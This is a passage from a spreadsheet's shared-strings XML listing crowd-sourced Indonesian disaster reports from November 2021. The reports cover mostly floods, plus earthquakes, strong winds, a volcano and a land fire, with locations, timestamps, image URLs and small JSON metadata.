    <t>https://images.petabencana.id/ee719780-f79b-4c22-af52-7ae595dd33e0.jpg</t>
  </si>
  <si>
    <t>Telah terjadi Angin Kencang pd hari Kamis,4 Nov 2021, Lokasi Jl.trns Sulawesi Desa Busisingo Kec Sangkub, dlm kejadian tersebut tdk ada korb</t>
  </si>
  <si>
    <t>Busisingo Utara</t>
  </si>
  <si>
    <t>03:53:58.415</t>
  </si>
  <si>
    <t>b441870d-2fa4-45cd-aec2-252e8e535a16</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b441870d-2fa4-45cd-aec2-252e8e535a16.jpg</t>
  </si>
  <si>
    <t>Telah Terjadi Gempa Bumi berskala 5.8 SR, pada hari Senin, 1 November 2021, yg menyebabkan 1 Gedung Bangunan Kantor Bupati Bol Mong Utara.</t>
  </si>
  <si>
    <t>17:52:09.027</t>
  </si>
  <si>
    <t>1f22412b-0640-4e84-844a-942305faa0b8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1f22412b-0640-4e84-844a-942305faa0b8.jpg</t>
  </si>
  <si>
    <t>2 jam lalu</t>
  </si>
  <si>
    <t>Gunung Lai</t>
  </si>
  <si>
    <t>Bontang Utara</t>
  </si>
  <si>
    <t>Bontang</t>
  </si>
  <si>
    <t>08:52:25.659</t>
  </si>
  <si>
    <t>11d64b63-9131-42aa-89d8-5116c3950e69</t>
  </si>
  <si>
    <t>https://images.petabencana.id/11d64b63-9131-42aa-89d8-5116c3950e69.jpg</t>
  </si>
  <si>
    <t>dokumentasi penanganan pohon tumbang yang di sebabkan oleh hujan deras dan agin kencang di 2 titik. 1. di perempatan lampu merah tugu kitri."</t>
  </si>
  <si>
    <t>08:56:03.302</t>
  </si>
  <si>
    <t>c6834c4f-ceb0-4171-907e-abe3b16c4ea1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c6834c4f-ceb0-4171-907e-abe3b16c4ea1.jpg</t>
  </si>
  <si>
    <t>Jalan arianatamanggala arah jangari cianjur kp munjul</t>
  </si>
  <si>
    <t>Kademangan</t>
  </si>
  <si>
    <t>Mande</t>
  </si>
  <si>
    <t>15:02:12.350</t>
  </si>
  <si>
    <t>23a07ace-2b7e-47de-bbb8-082440a7b2cd</t>
  </si>
  <si>
    <t>https://images.petabencana.id/23a07ace-2b7e-47de-bbb8-082440a7b2cd.jpg</t>
  </si>
  <si>
    <t>Sawah Gede</t>
  </si>
  <si>
    <t>11:21:26.926</t>
  </si>
  <si>
    <t>619d480b-b9f5-44d4-9c47-24f415be2846</t>
  </si>
  <si>
    <t>https://images.petabencana.id/619d480b-b9f5-44d4-9c47-24f415be2846.jpg</t>
  </si>
  <si>
    <t>07:56:47.821</t>
  </si>
  <si>
    <t>1422cdb8-ac5e-4a37-880b-748792af2843</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1422cdb8-ac5e-4a37-880b-748792af2843.jpg</t>
  </si>
  <si>
    <t>18:19:55.745</t>
  </si>
  <si>
    <t>7e5c5964-20a9-4770-9772-af482f5a1a12</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7e5c5964-20a9-4770-9772-af482f5a1a12.jpg</t>
  </si>
  <si>
    <t>Tolong pak, setiap bulan rumah kami terendam</t>
  </si>
  <si>
    <t>Simpang Tetap Darul I</t>
  </si>
  <si>
    <t>22:20:56.583</t>
  </si>
  <si>
    <t>0245d055-c96e-42bb-8c8e-10738d7d06ac</t>
  </si>
  <si>
    <t>Banjir/genangan 40 cm</t>
  </si>
  <si>
    <t>09:36:04.250</t>
  </si>
  <si>
    <t>3f0f70f2-b5bb-4d02-bc52-8ef6e0be2f87</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3f0f70f2-b5bb-4d02-bc52-8ef6e0be2f87.jpg</t>
  </si>
  <si>
    <t>Mampang</t>
  </si>
  <si>
    <t>02:53:50.429</t>
  </si>
  <si>
    <t>032a25f2-3966-4110-8b80-9a709ba58af0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/032a25f2-3966-4110-8b80-9a709ba58af0.jpg</t>
  </si>
  <si>
    <t>Airnya keruh dan meresahkan</t>
  </si>
  <si>
    <t>Tunggulo</t>
  </si>
  <si>
    <t>Limboto Barat</t>
  </si>
  <si>
    <t>22:46:08.685</t>
  </si>
  <si>
    <t>20a1edf6-43c9-41f9-817e-f548a8ce8b59</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": null, "instance_region_code": "ID-MU" }</t>
  </si>
  <si>
    <t>Banjir terjadi akibat Curah Hujan Yang Tinggi mengakibatkan banjir setinggi 1,5 Meter 20 unit Rumah Terendam 1 Fasilitas Sekolah SMP Terendam"</t>
  </si>
  <si>
    <t>Asimiro</t>
  </si>
  <si>
    <t>Loloda Utara</t>
  </si>
  <si>
    <t>Halmahera Utara</t>
  </si>
  <si>
    <t>Maluku Utara</t>
  </si>
  <si>
    <t>17:01:55.133</t>
  </si>
  <si>
    <t>b7c94165-bc32-47fc-b194-da112d9b88e3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b7c94165-bc32-47fc-b194-da112d9b88e3.jpg</t>
  </si>
  <si>
    <t>di Kabupaten Hulu Sungai Tengah, Provinsi Kalimantan Selatan saat ini terjadi banjir yang cukup parah dan luas</t>
  </si>
  <si>
    <t>19:39:12.347</t>
  </si>
  <si>
    <t>003ce93b-3c3a-4548-a63c-8912fb07e7d3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/003ce93b-3c3a-4548-a63c-8912fb07e7d3.jpg</t>
  </si>
  <si>
    <t>Hujan beberapa hari terakhir ini yang cukup lama</t>
  </si>
  <si>
    <t>Bukat</t>
  </si>
  <si>
    <t>08:58:59.118</t>
  </si>
  <si>
    <t>b95ac469-a63e-44ab-a487-3370756ebdc7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b95ac469-a63e-44ab-a487-3370756ebdc7.jpg</t>
  </si>
  <si>
    <t>Kondisi saat ini</t>
  </si>
  <si>
    <t>04:47:39.923</t>
  </si>
  <si>
    <t>5577f863-1b0e-4c34-9fe6-7d616c1fb0fb</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5577f863-1b0e-4c34-9fe6-7d616c1fb0fb.jpg</t>
  </si>
  <si>
    <t>Kondisi saat ini di desa pajujungan kabupaten hulu sungai tengah</t>
  </si>
  <si>
    <t>10:02:48.097</t>
  </si>
  <si>
    <t>cf20a21c-da7c-4b64-8e2f-634fd7873458</t>
  </si>
  <si>
    <t>https://images.petabencana.id/cf20a21c-da7c-4b64-8e2f-634fd7873458.jpg</t>
  </si>
  <si>
    <t>Kondisi saat ini di munti raya kab hulu sungai tengah</t>
  </si>
  <si>
    <t>07:29:59.229</t>
  </si>
  <si>
    <t>1e5fe529-1515-4907-914f-dfa855e13af9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1e5fe529-1515-4907-914f-dfa855e13af9.jpg</t>
  </si>
  <si>
    <t>Untuk saat ini masih menggenangi</t>
  </si>
  <si>
    <t>Aluan Mati</t>
  </si>
  <si>
    <t>Batu Benawa</t>
  </si>
  <si>
    <t>04:36:15.697</t>
  </si>
  <si>
    <t>253c7615-a67d-49be-8c2a-71da608c84e3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/253c7615-a67d-49be-8c2a-71da608c84e3.jpg</t>
  </si>
  <si>
    <t>banjir kota amuntai</t>
  </si>
  <si>
    <t>Antasari</t>
  </si>
  <si>
    <t>Amuntai Tengah</t>
  </si>
  <si>
    <t>04:33:35.907</t>
  </si>
  <si>
    <t>d0928ffd-e018-461e-9afd-71c5e57cd368</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d0928ffd-e018-461e-9afd-71c5e57cd368.jpg</t>
  </si>
  <si>
    <t>Pada hari ini, banjir telah memasuki Kota Amuntai, Kabupaten Hulu Sungai Utara, Ketinggian banjir sekitar lutut orang dewasa.</t>
  </si>
  <si>
    <t>01:19:57.479</t>
  </si>
  <si>
    <t>664e6964-2d3d-4240-a03d-ecdffd7367d9</t>
  </si>
  <si>
    <t>banjir depan univ mpu tantular, jalanan ditutup tidak bisa dilewati kendaraan bermotor</t>
  </si>
  <si>
    <t>11:38:34.971</t>
  </si>
  <si>
    <t>c20be32a-210e-4e6e-8dcd-ee6d4b6994e9</t>
  </si>
  <si>
    <t>Banjir di daerah Carina Sayang, kembangan Jakarta Barat</t>
  </si>
  <si>
    <t>12:01:01.511</t>
  </si>
  <si>
    <t>e451251c-5540-4e70-ad41-4b8ce5a2376a</t>
  </si>
  <si>
    <t>Banjir di jalan setinggi dengkul orang dewasa</t>
  </si>
  <si>
    <t>09:53:41.013</t>
  </si>
  <si>
    <t>ff999d28-f061-492b-80cb-9b1560820ac6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ff999d28-f061-492b-80cb-9b1560820ac6.jpg</t>
  </si>
  <si>
    <t>Banjir tambah tinggi, hujan mulai lagi. Tolong dibantu segera pompanya</t>
  </si>
  <si>
    <t>08:21:34.509</t>
  </si>
  <si>
    <t>be29c86f-d73f-417a-8b3c-d11c0026467e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/be29c86f-d73f-417a-8b3c-d11c0026467e.jpg</t>
  </si>
  <si>
    <t>Baru 1jam an hujan udah banjir tinggi, danasih bertambah tinggi..</t>
  </si>
  <si>
    <t>10:39:34.319</t>
  </si>
  <si>
    <t>1d0038f7-ac11-4741-a9a6-32e5d89bf19c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1d0038f7-ac11-4741-a9a6-32e5d89bf19c.jpg</t>
  </si>
  <si>
    <t>Baru mulai tradisi tahunan... hujan setengah jam, air langsung naik... pompa tidak ada yang berfungsi... daerah sekitar sudah dalam...</t>
  </si>
  <si>
    <t>08:41:45.557</t>
  </si>
  <si>
    <t>3aa4ec39-660b-4717-bf83-b86806074967</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3aa4ec39-660b-4717-bf83-b86806074967.jpg</t>
  </si>
  <si>
    <t>Genangan air luapan Kali Pesanggrahan setelah hujan sangat deras</t>
  </si>
  <si>
    <t>11:31:57.400</t>
  </si>
  <si>
    <t>f5139303-b49c-46ac-97bb-b895800ce5b2</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2665", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Halo, saya mau ikut laporan banjir ya, tau ada ini dari Twitter. Keren. So, baru 2 bulan di jakarta dan ngeliat banjir hehe, hampir selutut.</t>
  </si>
  <si>
    <t>11:30:02.812</t>
  </si>
  <si>
    <t>318a99ee-b047-4745-b6f3-2a320afb5d80</t>
  </si>
  <si>
    <t>https://images.petabencana.id/318a99ee-b047-4745-b6f3-2a320afb5d80.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1040", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>7 november 2021, Banjir di Jl. Ciledug Raya, RT.8/RW.11, Cipulir, Kec. Kby. Lama, Kota Jakarta Selatan, Daerah Khusus Ibukota Jakarta 12230</t>
  </si>
  <si>
    <t>10:25:55.084</t>
  </si>
  <si>
    <t>55d8d001-fd2c-45bb-9373-2bc368a423bc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/55d8d001-fd2c-45bb-9373-2bc368a423bc.jpg</t>
  </si>
  <si>
    <t>Banjir sejak jam 15.00.</t>
  </si>
  <si>
    <t>13:30:52.439</t>
  </si>
  <si>
    <t>a1c708da-17bc-4ae1-afc2-bea2702c5efa</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a1c708da-17bc-4ae1-afc2-bea2702c5efa.jpg</t>
  </si>
  <si>
    <t>Banjir tinggi di komp.Sangrila indah 2,Kel. Petukangan Selatan, Kec. Pesanggrahan, Jaksel...dari tadi sore dan hampir semua rumah warga kena</t>
  </si>
  <si>
    <t>15:46:46.249</t>
  </si>
  <si>
    <t>62709950-1989-462c-b8b1-6005f549a992</t>
  </si>
  <si>
    <t>Banjir, Kemang Utara</t>
  </si>
  <si>
    <t>07:01:55.000</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/362144</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2021/11/08/16363549141704125230.jpg</t>
  </si>
  <si>
    <t>{ "points": -2 }</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "841", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Keren! Pemprov DKI Akan Buat 22 Ribu Titik Sumur Resapan</t>
  </si>
  <si>
    <t>Dalam mengatasi banjir di musim penghujan, Pemprov DKI memberi solusi untuk sumur resapan yang akan dibuat 22 ribu titik untuk tahun ini. Dijalan Jendral Soekanto pinggiran BKT sedang dilakukan pembangunan tersebut. Harapannya dari sumur resapan ini adal</t>
  </si>
  <si>
    <t>08:54:41.469</t>
  </si>
  <si>
    <t>a2557971-9b76-4e95-924c-afa2b2035c8c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a2557971-9b76-4e95-924c-afa2b2035c8c.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1313", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Dekat Alfamidi m.saidi, mobil rendah putar balik aja.</t>
  </si>
  <si>
    <t>11:40:16.270</t>
  </si>
  <si>
    <t>f57f07c6-6bbe-467a-acd6-06a253a76bac</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f57f07c6-6bbe-467a-acd6-06a253a76bac.jpg</t>
  </si>
  <si>
    <t>Hujan deras mulai jam 12 siang, jam 1:30 sudah mulai penampakan banjirnya. Hingga saat ini jam 18:39 masih banjir 15cm-30cm.</t>
  </si>
  <si>
    <t>10:51:43.851</t>
  </si>
  <si>
    <t>bd475aa1-1866-4851-bf58-ad0480dcfcdf</t>
  </si>
  <si>
    <t>https://images.petabencana.id/bd475aa1-1866-4851-bf58-ad0480dcfcdf.jpg</t>
  </si>
  <si>
    <t>Jalan kemang utara G rt 2 rw 9</t>
  </si>
  <si>
    <t>08:59:44.189</t>
  </si>
  <si>
    <t>46dd8957-a76f-4a02-a25b-13e938cfaf0a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/46dd8957-a76f-4a02-a25b-13e938cfaf0a.jpg</t>
  </si>
  <si>
    <t>Jl. Pulogayung, udah langganan :(</t>
  </si>
  <si>
    <t>08:02:45.798</t>
  </si>
  <si>
    <t>72557229-2626-4880-aee4-e03808c151bf</t>
  </si>
  <si>
    <t>https://images.petabencana.id/72557229-2626-4880-aee4-e03808c151bf.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "943", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Terjadi genangan setinggi 5 cm</t>
  </si>
  <si>
    <t>11:08:52.191</t>
  </si>
  <si>
    <t>ec5dbdf8-5242-4908-8574-6276763efccc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ec5dbdf8-5242-4908-8574-6276763efccc.jpg</t>
  </si>
  <si>
    <t>10:47:18.295</t>
  </si>
  <si>
    <t>d71c345c-0c3b-4d6d-859f-d978ab25f55e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d71c345c-0c3b-4d6d-859f-d978ab25f55e.jpg</t>
  </si>
  <si>
    <t>8 november 2021 dini hari, banjir di Kebon pala, kel.kampung melayu, jatinegara, jaktim Akibat luapan sungai ciliwung"</t>
  </si>
  <si>
    <t>10:56:56.099</t>
  </si>
  <si>
    <t>a93bb51f-db3d-4b91-a3c3-b5c54ccb4d5e</t>
  </si>
  <si>
    <t>Banjir &amp; macet total, bagi pengendara lebih baik lewat kayu tinggi depan kantor kelurahan cakung timur aman dan lancar padat merayap</t>
  </si>
  <si>
    <t>08:27:19.000</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/362045</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2021/11/01/362045-16357552391995770207.mp4-03.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1582", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jalan Pagelaran Cipayung Juga Terendam Banjir</t>
  </si>
  <si>
    <t>Hujan yang turun sejak siang hari ini membuat di sekitaran wilayah Jakarta terdampak banjir, seperti di Jalan Pagelarang Cipayung, Jakarta Timur ini. Lalu lintas menjadi tersendat dikarenakan harus satu arah untuk melewati Jalan yang dibanjiri air terseb</t>
  </si>
  <si>
    <t>07:23:25.430</t>
  </si>
  <si>
    <t>a3013d97-2106-471e-9d9c-0f930e5d763c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a3013d97-2106-471e-9d9c-0f930e5d763c.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2562", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir Rob di Ancol Sumber: Tempo</t>
  </si>
  <si>
    <t>08:49:23.902</t>
  </si>
  <si>
    <t>a2fb1518-8f56-4959-81ff-9fcd26d85133</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a2fb1518-8f56-4959-81ff-9fcd26d85133.jpg</t>
  </si>
  <si>
    <t>Kebanjiran yg merusak perumahan</t>
  </si>
  <si>
    <t>Kasikan</t>
  </si>
  <si>
    <t>Tapung Hulu</t>
  </si>
  <si>
    <t>Kampar</t>
  </si>
  <si>
    <t>02:09:23.774</t>
  </si>
  <si>
    <t>4d62da0c-2ee8-4e6e-828d-4baca72abe7a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4d62da0c-2ee8-4e6e-828d-4baca72abe7a.jpg</t>
  </si>
  <si>
    <t>Banjir yang melanda Kecamatan Selimbau selama 2 minggu, Kabupaten Kapuas Hulu, Kalimantan Barat.</t>
  </si>
  <si>
    <t>Gudang Hilir</t>
  </si>
  <si>
    <t>Selimbau</t>
  </si>
  <si>
    <t>02:12:26.270</t>
  </si>
  <si>
    <t>b3c8baec-7d5f-4da0-a091-05cb58ef74fa</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b3c8baec-7d5f-4da0-a091-05cb58ef74fa.jpg</t>
  </si>
  <si>
    <t>Ngilir</t>
  </si>
  <si>
    <t>01:07:10.593</t>
  </si>
  <si>
    <t>21a66cf0-0008-4c90-8d8a-ddcbf20c388d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/21a66cf0-0008-4c90-8d8a-ddcbf20c388d.jpg</t>
  </si>
  <si>
    <t>Banjir di Desa Mensubang Kec. Nanga Tayap Kab. Ketapang Kalimantan Barat</t>
  </si>
  <si>
    <t>Mensubang</t>
  </si>
  <si>
    <t>Nanga Tayap</t>
  </si>
  <si>
    <t>14:11:21.149</t>
  </si>
  <si>
    <t>63a6a36e-ba6c-4a43-9788-818bf75618a0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/63a6a36e-ba6c-4a43-9788-818bf75618a0.jpg</t>
  </si>
  <si>
    <t>Tlogoanyar</t>
  </si>
  <si>
    <t>23:47:49.368</t>
  </si>
  <si>
    <t>cfdd9477-d345-4c69-a86c-f49934c8bc6c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/cfdd9477-d345-4c69-a86c-f49934c8bc6c.jpg</t>
  </si>
  <si>
    <t>Air x jadi keruh</t>
  </si>
  <si>
    <t>Kekait</t>
  </si>
  <si>
    <t>Gunung Sari</t>
  </si>
  <si>
    <t>Lombok Barat</t>
  </si>
  <si>
    <t>00:55:36.979</t>
  </si>
  <si>
    <t>410fc156-3f86-4dc1-b33b-12b7a71854e4</t>
  </si>
  <si>
    <t>Pengisian volume tampungan bendungan</t>
  </si>
  <si>
    <t>03:19:13.951</t>
  </si>
  <si>
    <t>57c9cb9c-0685-45be-b1d6-891624e34735</t>
  </si>
  <si>
    <t>https://images.petabencana.id/57c9cb9c-0685-45be-b1d6-891624e34735.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "volcano", "volcanicSigns": [ 4 ], "evacuationNumber": 1, "evacuationArea": false }</t>
  </si>
  <si>
    <t>Api diam dan gemuruh Semeru</t>
  </si>
  <si>
    <t>Ampelgading</t>
  </si>
  <si>
    <t>13:03:25.885</t>
  </si>
  <si>
    <t>4a14db73-afc2-459e-b43b-07e1914f4d5d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4a14db73-afc2-459e-b43b-07e1914f4d5d.jpg</t>
  </si>
  <si>
    <t>Selain membawa material potongan kayu dan sampah, banjir tersebut juga menyebabkan beberapa rumah warga di Kelurahan Jatimulyo juga terendam</t>
  </si>
  <si>
    <t>Jatimulyo</t>
  </si>
  <si>
    <t>04:29:08.158</t>
  </si>
  <si>
    <t>bebcb140-7edd-494c-862c-2c9152ddcf11</t>
  </si>
  <si>
    <t>https://images.petabencana.id/bebcb140-7edd-494c-862c-2c9152ddcf11.jpg</t>
  </si>
  <si>
    <t>Gempa bumi mengguncang Maluku Tengah. Foto diambil di Desa Sawai. Beberapa rumah dindingnya retak dan roboh.</t>
  </si>
  <si>
    <t>Sawai</t>
  </si>
  <si>
    <t>Seram Utara</t>
  </si>
  <si>
    <t>06:56:33.643</t>
  </si>
  <si>
    <t>3d5e9507-856e-4c79-b9a7-ed00d3f8d0b8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3d5e9507-856e-4c79-b9a7-ed00d3f8d0b8.jpg</t>
  </si>
  <si>
    <t>Terjadi angin kencang yang menyebabkan pohon tumbang dan menimpah satu mobil.</t>
  </si>
  <si>
    <t>Cakranegara Timur</t>
  </si>
  <si>
    <t>Cakranegara</t>
  </si>
  <si>
    <t>07:22:18.760</t>
  </si>
  <si>
    <t>b4e83379-1bfa-405d-bd0b-226c304eef17</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b4e83379-1bfa-405d-bd0b-226c304eef17.jpg</t>
  </si>
  <si>
    <t>Banjir di lapangan merdeka medan 23 november malam</t>
  </si>
  <si>
    <t>Kesawan</t>
  </si>
  <si>
    <t>Medan Barat</t>
  </si>
  <si>
    <t>16:45:59.216</t>
  </si>
  <si>
    <t>66cd2559-d7de-45b4-b0b3-d05aa1799214</t>
  </si>
  <si>
    <t>https://images.petabencana.id/66cd2559-d7de-45b4-b0b3-d05aa1799214.jpg</t>
  </si>
  <si>
    <t>Simpang Tanjung</t>
  </si>
  <si>
    <t>09:57:14.486</t>
  </si>
  <si>
    <t>d9442502-de5c-4e04-84f0-3328297194c3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d9442502-de5c-4e04-84f0-3328297194c3.jpg</t>
  </si>
  <si>
    <t>Banjir Kecamatan Tanah Pinoh,dan Tanah Pinoh Barat</t>
  </si>
  <si>
    <t>Suka Maju</t>
  </si>
  <si>
    <t>Tanah Pinoh</t>
  </si>
  <si>
    <t>10:11:26.975</t>
  </si>
  <si>
    <t>393d707e-e273-4682-9d3e-78b87b4c08d9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/393d707e-e273-4682-9d3e-78b87b4c08d9.jpg</t>
  </si>
  <si>
    <t>Kecamatan Tanah Pinoh, Kabupaten Melawi</t>
  </si>
  <si>
    <t>Keranjik</t>
  </si>
  <si>
    <t>15:29:31.965</t>
  </si>
  <si>
    <t>365343bc-1e24-4bc6-b4fb-655eb03f1598</t>
  </si>
  <si>
    <t>https://images.petabencana.id/365343bc-1e24-4bc6-b4fb-655eb03f1598.jpg</t>
  </si>
  <si>
    <t>Ketanggi</t>
  </si>
  <si>
    <t>Ngawi</t>
  </si>
  <si>
    <t>03:06:59.000</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/362035</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2021/11/01/16357360191861787760.jpg</t>
  </si>
  <si>
    <t>Banjir Melanda Dua Desa di Sayur Matinggi, Tapanuli Selatan</t>
  </si>
  <si>
    <t>Banjir  melanda dua desa, Desa Sipange dan Desa Tolang Jae, Kecamatan Sayur Matinggi, Tapanuli Selatan yang diakibatkan luapan Sungai Batang Angkola (31/10/2021), menyisakan kayu besar di lokasi dan merusak bendungan serta sebagian fasilitas umum.</t>
  </si>
  <si>
    <t>Wek Ii</t>
  </si>
  <si>
    <t>Padangsidimpuan Utara</t>
  </si>
  <si>
    <t>Padangsidimpuan</t>
  </si>
  <si>
    <t>12:35:46.589</t>
  </si>
  <si>
    <t>5efbf1d4-175d-4222-aee4-3d20f93dcd85</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5efbf1d4-175d-4222-aee4-3d20f93dcd85.jpg</t>
  </si>
  <si>
    <t>Air masuk kedalam rumah dengan ketinggian sekitar 30 cm jika diluar hampir 80cm</t>
  </si>
  <si>
    <t>Panarung</t>
  </si>
  <si>
    <t>Pahandut</t>
  </si>
  <si>
    <t>Palangka Raya</t>
  </si>
  <si>
    <t>08:39:47.317</t>
  </si>
  <si>
    <t>d47b02ff-4e24-4078-8bd2-c87ae89ba069</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d47b02ff-4e24-4078-8bd2-c87ae89ba069.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "fire", "fireDistance": 54.609869, "fireLocation": { "lat": -3.428208, "lng": 104.241960 }, "personLocation": { "lat": -3.426955, "lng": 104.242444 }, "fireRadius": { "lat": -3.428669, "lng": 104.241788 } }</t>
  </si>
  <si>
    <t>Kebakaran lahan kosong Di eks MaPolsek Prabumulih Timur Kel. Tugukecil Kec. Prabumulih Timur"</t>
  </si>
  <si>
    <t>Pasar Prabumulih</t>
  </si>
  <si>
    <t>Prabumulih Utara</t>
  </si>
  <si>
    <t>Prabumulih</t>
  </si>
  <si>
    <t>04:00:08.937</t>
  </si>
  <si>
    <t>5edce3ad-cc4c-4d2c-b491-d80ebf458d50</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5edce3ad-cc4c-4d2c-b491-d80ebf458d50.jpg</t>
  </si>
  <si>
    <t>Banjir di jalan provinsi sekitar desa penda barania provinsi kalimantan tengah, pembangunan jalan layang hingga saat ini belum rampung.</t>
  </si>
  <si>
    <t>11:22:14.784</t>
  </si>
  <si>
    <t>02a6ab9a-3c99-434b-b963-00a7a481ba86</t>
  </si>
  <si>
    <t>Ilir Kota</t>
  </si>
  <si>
    <t>Kapuas</t>
  </si>
  <si>
    <t>16:34:31.568</t>
  </si>
  <si>
    <t>7368d54d-b6e8-40ab-b7ad-b5489f62b4ac</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7368d54d-b6e8-40ab-b7ad-b5489f62b4ac.jpg</t>
  </si>
  <si>
    <t>jika terus naik sekitar 50 cm lagi kemungkinan akan banyak membutuhkan area atau tenda pengungsian</t>
  </si>
  <si>
    <t>00:15:57.615</t>
  </si>
  <si>
    <t>34061dd9-39b9-4dba-9808-62642a2a7c1e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/34061dd9-39b9-4dba-9808-62642a2a7c1e.jpg</t>
  </si>
  <si>
    <t>Tanjung Sekayam</t>
  </si>
  <si>
    <t>22:20:28.603</t>
  </si>
  <si>
    <t>37e689a5-1aa3-48f2-82e5-165ac1f104a2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/37e689a5-1aa3-48f2-82e5-165ac1f104a2.jpg</t>
  </si>
  <si>
    <t>Banjir sudah melanda lebih dari 2 Minggu, debit air masih terus naik.</t>
  </si>
  <si>
    <t>Sungai Ringin</t>
  </si>
  <si>
    <t>Sekadau Hilir</t>
  </si>
  <si>
    <t>Sekadau</t>
  </si>
  <si>
    <t>13:04:17.197</t>
  </si>
  <si>
    <t>b4937529-2368-4449-879e-e302220aaaac</t>
  </si>
  <si>
    <t>Humch didalam rumah saya banjirnya sudah sepinggang, jalanan tidak bisa dilalui dan mengakibatkan saya sudah beraktivitas terutama sekolah</t>
  </si>
  <si>
    <t>11:28:39.874</t>
  </si>
  <si>
    <t>8237dc2a-aaa9-4720-b916-d8ef7d32b466</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8237dc2a-aaa9-4720-b916-d8ef7d32b466.jpg</t>
  </si>
  <si>
    <t>Kerusakan parah, korban jiwa belom diketahui</t>
  </si>
  <si>
    <t>Ungaran Timur</t>
  </si>
  <si>
    <t>13:23:15.078</t>
  </si>
  <si>
    <t>154639ce-cfc8-4536-8557-a77d6a6ce1d2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/154639ce-cfc8-4536-8557-a77d6a6ce1d2.jpg</t>
  </si>
  <si>
    <t>Sidoarjo waru pepelegi indah Hujan deras tepat pukul 17.00 wib cuaca saat itu gelap sehingga banjir mengenangi jalanan&amp;rmh warga</t>
  </si>
  <si>
    <t>05:55:27.490</t>
  </si>
  <si>
    <t>5b0be962-8523-4ec7-a5bc-67779d693ffb</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5b0be962-8523-4ec7-a5bc-67779d693ffb.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 162 }</t>
  </si>
  <si>
    <t>6/11-2021, Sintang Kalimantan Barat. Hampir seluruh Kabupaten Sintang terendam banjir, di beberapa titik, sudah mencapat atap rumah warga.</t>
  </si>
  <si>
    <t>Ladang</t>
  </si>
  <si>
    <t>11:14:53.258</t>
  </si>
  <si>
    <t>de6dffff-7229-4bbf-802e-a9fdf051fb5e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/de6dffff-7229-4bbf-802e-a9fdf051fb5e.jpg</t>
  </si>
  <si>
    <t>banjir di kelurahan ladang, kecamatan sintang, kab. sintang, kalimantan barat dengan ketinggian mencapai 150 cm</t>
  </si>
  <si>
    <t>12:41:44.068</t>
  </si>
  <si>
    <t>a0f8289e-121f-4092-8424-236be13044b1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a0f8289e-121f-4092-8424-236be13044b1.jpg</t>
  </si>
  <si>
